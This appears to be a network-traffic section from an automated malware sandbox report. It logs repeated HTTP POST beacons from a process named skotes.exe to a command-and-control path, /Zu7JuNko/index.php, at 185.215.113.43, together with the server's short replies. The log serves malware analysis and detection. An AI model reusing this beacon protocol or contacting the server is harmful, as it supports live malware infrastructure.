                                                        Dec 20, 2024 16:10:05.806519032 CET8049731185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:05.806577921 CET4973180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:05.806969881 CET8049730185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:05.807022095 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:07.218205929 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:07.337918043 CET8049732185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:07.337996006 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:07.339086056 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:07.458543062 CET8049732185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:08.680332899 CET8049732185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:08.680670023 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.253215075 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.253595114 CET4973380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.373172045 CET8049732185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:11.373188972 CET8049733185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:11.373238087 CET4973280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.373291969 CET4973380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.373759985 CET4973380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:11.493505955 CET8049733185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:12.717416048 CET8049733185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:12.718611956 CET4973380192.168.2.8185.215.113.43
                                                        • 185.215.113.43
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849709185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:04.761008978 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:06.102077007 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849710185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:07.725120068 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:09.149262905 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.849711185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:10.897082090 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:12.259918928 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.849712185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:13.881902933 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:15.246069908 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.849713185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:16.992872000 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:18.361529112 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.849714185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:19.991131067 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:21.332242012 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.849715185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:23.084517002 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:24.430284977 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.849716185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:26.053617954 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:27.407341003 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.849718185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:29.148916960 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:30.551928997 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.849720185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:32.178813934 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:33.530127048 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.849721185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:35.294748068 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:36.648319960 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.849722185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:38.272156000 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:39.651995897 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.849723185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:41.398930073 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:42.738420010 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.849724185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:44.367697954 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:45.725827932 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.849725185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:47.491126060 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:48.838783979 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.849726185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:50.477078915 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:51.827888966 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.849727185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:53.570368052 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:09:54.920331955 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.849728185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:56.554217100 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:09:57.899444103 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:09:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.849729185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:09:59.649506092 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:10:01.005407095 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:10:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.849730185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:10:02.678082943 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:10:04.056854963 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:10:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


